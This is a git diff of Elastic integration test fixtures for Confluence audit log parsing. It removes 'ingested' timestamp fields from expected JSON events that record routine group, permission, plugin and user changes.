@@ -15456,7 +15288,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:46:29.837617548Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.246Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SYSTEMADMINISTRATOR\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -15541,7 +15372,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:46:29.837618428Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.243Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"USECONFLUENCE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -15626,7 +15456,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:46:29.837619391Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.241Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"ADMINISTRATECONFLUENCE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -15711,7 +15540,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:46:29.837620266Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.239Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"PERSONALSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -15796,7 +15624,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:46:29.837621150Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.217Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"USECONFLUENCE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15869,7 +15696,6 @@ }, "event": { "action": "audit.logging.summary.group.created", - "ingested": "2021-12-24T00:46:29.837622041Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.201Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.group.created\",\"action\":\"Group created\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", 
@@ -15945,7 +15771,6 @@ }, "event": { "action": "audit.logging.summary.group.created", - "ingested": "2021-12-24T00:46:29.837622923Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.188Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.group.created\",\"action\":\"Group created\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", 
@@ -16111,7 +15936,6 @@ }, "event": { "action": "audit.logging.summary.directory.added", - "ingested": "2021-12-24T00:46:29.837623917Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.109Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.directory.added\",\"action\":\"User directory created\"},\"affectedObjects\":[{\"name\":\"Confluence Internal Directory\",\"type\":\"Directory\"}],\"changedValues\":[{\"key\":\"Active\",\"i18nKey\":\"Active\",\"to\":\"Yes\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"CREATE_GROUP\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_USER\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_USER_ATTRIBUTE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_ROLE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"DELETE_GROUP\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_GROUP_ATTRIBUTE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_ROLE_ATTRIBUTE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"CREATE_ROLE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"DELETE_ROLE\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"UPDATE_GROUP\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"DELETE_USER\"},{\"key\":\"Allowed operation\",\"i18nKey\":\"Allowed operation\",\"to\":\"CREATE_USER\"},{\"key\":\"Description\",\"i18nKey\":\"Description\",\"to\":\"Confluence default internal directory\"},{\"key\":\"Encryption type\",\"i18nKey\":\"Encryption 
type\",\"to\":\"atlassian-security\"},{\"key\":\"ID\",\"i18nKey\":\"ID\",\"to\":\"327681\"},{\"key\":\"Name\",\"i18nKey\":\"Name\",\"to\":\"Confluence Internal Directory\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"INTERNAL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -16177,7 +16001,6 @@ }, "event": { "action": "audit.logging.summary.space.import", - "ingested": "2021-12-24T00:46:29.837624794Z", "original": "{\"timestamp\":\"2021-11-23T00:34:46.735Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.import.export\",\"category\":\"Import/Export\",\"actionI18nKey\":\"audit.logging.summary.space.import\",\"action\":\"Space import\"},\"affectedObjects\":[{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -16241,7 +16064,6 @@ }, "event": { "action": "audit.logging.summary.plugin.enabled", - "ingested": "2021-12-24T00:46:29.837625662Z", "original": "{\"timestamp\":\"2021-11-23T00:34:45.732Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.plugins\",\"category\":\"Apps\",\"actionI18nKey\":\"audit.logging.summary.plugin.enabled\",\"action\":\"App enabled\"},\"affectedObjects\":[{\"name\":\"Synchrony Interop Bootstrap Plugin\",\"type\":\"App\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -16305,7 +16127,6 @@ }, "event": { "action": "audit.logging.summary.plugin.enabled", - "ingested": "2021-12-24T00:46:29.837626528Z", "original": "{\"timestamp\":\"2021-11-23T00:34:44.466Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.plugins\",\"category\":\"Apps\",\"actionI18nKey\":\"audit.logging.summary.plugin.enabled\",\"action\":\"App enabled\"},\"affectedObjects\":[{\"name\":\"Confluence Collaborative Editor Plugin\",\"type\":\"App\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -16372,7 +16193,6 @@ }, "event": { "action": "audit.logging.summary.user.renamed", - "ingested": "2021-12-24T00:46:29.837627836Z", "original": "{\"timestamp\":\"2021-11-28T17:05:37.142Z\",\"author\":{\"name\":\"Joe Bob\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin123\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.user.renamed\",\"action\":\"User renamed\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=asdf123\",\"id\":\"2c9680837d4a3682017d67821e520003\"}],\"changedValues\":[{\"key\":\"Username\",\"i18nKey\":\"audit.logging.changed.value.username\",\"from\":\"asdf\",\"to\":\"asdf123\"}],\"source\":\"10.100.100.2\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", 
@@ -16443,7 +16263,6 @@ }, "event": { "action": "audit.logging.summary.user.updated", - "ingested": "2021-12-24T00:46:29.837628821Z", "original": "{\"timestamp\":\"2021-11-28T17:06:11.805Z\",\"author\":{\"name\":\"Joe Bob\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin123\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.user.updated\",\"action\":\"User details updated\"},\"affectedObjects\":[{\"name\":\"asdf asdfasdf\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=asdf123\",\"id\":\"2c9680837d4a3682017d67821e520003\"}],\"changedValues\":[],\"source\":\"10.100.100.2\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", 
@@ -16521,7 +16340,6 @@ }, "event": { "action": "audit.logging.summary.user.updated", - "ingested": "2021-12-24T00:46:29.837629689Z", "original": "{\"timestamp\":\"2021-11-28T17:05:37.158Z\",\"author\":{\"name\":\"Joe Bob\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin123\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.user.updated\",\"action\":\"User details updated\"},\"affectedObjects\":[{\"name\":\"asdf asdfasdf\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=asdf123\",\"id\":\"2c9680837d4a3682017d67821e520003\"}],\"changedValues\":[{\"key\":\"Display name\",\"i18nKey\":\"Display name\",\"from\":\"asdf\",\"to\":\"asdf asdfasdf\"}],\"source\":\"10.100.100.2\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", diff --git a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json index 37a34c21b8e..6467ffd1297 100644 --- a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json +++ b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json 
@@ -53,7 +53,6 @@ }, "event": { "action": "audit.logging.summary.plugin.enabled", - "ingested": "2021-12-24T00:47:21.347838021Z", "original": "{\"affectedObjects\":[{\"name\":\"Synchrony Interop Bootstrap Plugin\",\"type\":\"App\"}],\"auditType\":{\"action\":\"App enabled\",\"actionI18nKey\":\"audit.logging.summary.plugin.enabled\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Apps\",\"categoryI18nKey\":\"audit.logging.category.plugins\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624567,\"nano\":332000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -119,7 +118,6 @@ }, "event": { "action": "audit.logging.summary.plugin.enabled", - "ingested": "2021-12-24T00:47:21.347840979Z", "original": "{\"affectedObjects\":[{\"name\":\"Confluence Collaborative Editor Plugin\",\"type\":\"App\"}],\"auditType\":{\"action\":\"App enabled\",\"actionI18nKey\":\"audit.logging.summary.plugin.enabled\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Apps\",\"categoryI18nKey\":\"audit.logging.category.plugins\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624565,\"nano\":791000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -186,7 +184,6 @@ }, "event": { "action": "audit.logging.summary.space.import", - "ingested": "2021-12-24T00:47:21.347841862Z", "original": "{\"affectedObjects\":[{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space import\",\"actionI18nKey\":\"audit.logging.summary.space.import\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Import/Export\",\"categoryI18nKey\":\"audit.logging.category.import.export\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624569,\"nano\":660000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -344,7 +341,6 @@ }, "event": { "action": "audit.logging.summary.directory.added", - "ingested": "2021-12-24T00:47:21.347842580Z", "original": "{\"affectedObjects\":[{\"name\":\"Confluence Internal Directory\",\"type\":\"Directory\"}],\"auditType\":{\"action\":\"User directory created\",\"actionI18nKey\":\"audit.logging.summary.directory.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"ID\",\"key\":\"ID\",\"to\":\"327681\"},{\"i18nKey\":\"Name\",\"key\":\"Name\",\"to\":\"Confluence Internal Directory\"},{\"i18nKey\":\"Active\",\"key\":\"Active\",\"to\":\"Yes\"},{\"i18nKey\":\"Encryption type\",\"key\":\"Encryption type\",\"to\":\"atlassian-security\"},{\"i18nKey\":\"Description\",\"key\":\"Description\",\"to\":\"Confluence default internal directory\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"INTERNAL\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_USER_ATTRIBUTE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_GROUP\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"DELETE_ROLE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"DELETE_GROUP\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_USER\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"DELETE_USER\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_GROUP_ATTRIBUTE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"CREATE_ROLE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"CREATE_USER\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_ROLE_ATTRIBUTE\"},{\"i18nKey\":\"Allowed 
operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_ROLE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"CREATE_GROUP\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":440000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -411,7 +407,6 @@ }, "event": { "action": "audit.logging.summary.group.created", - "ingested": "2021-12-24T00:47:21.347843346Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Group created\",\"actionI18nKey\":\"audit.logging.summary.group.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":536000000},\"version\":\"1.0\"}", "type": [ "group", 
@@ -488,7 +483,6 @@ }, "event": { "action": "audit.logging.summary.group.created", - "ingested": "2021-12-24T00:47:21.347844047Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Group created\",\"actionI18nKey\":\"audit.logging.summary.group.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":552000000},\"version\":\"1.0\"}", "type": [ "group", @@ -577,7 +571,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:47:21.347844752Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"USECONFLUENCE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":592000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -663,7 +656,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:47:21.347845455Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"PERSONALSPACE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":620000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -749,7 +741,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:47:21.347846150Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"ADMINISTRATECONFLUENCE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":623000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -835,7 +826,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:47:21.347846911Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"USECONFLUENCE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":627000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -921,7 +911,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:47:21.347847648Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"SYSTEMADMINISTRATOR\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":688000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -1007,7 +996,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:47:21.347848485Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"PERSONALSPACE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":692000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1093,7 +1081,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:47:21.347849210Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATESPACE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":694000000},\"version\":\"1.0\"}", "type": [ "admin", 
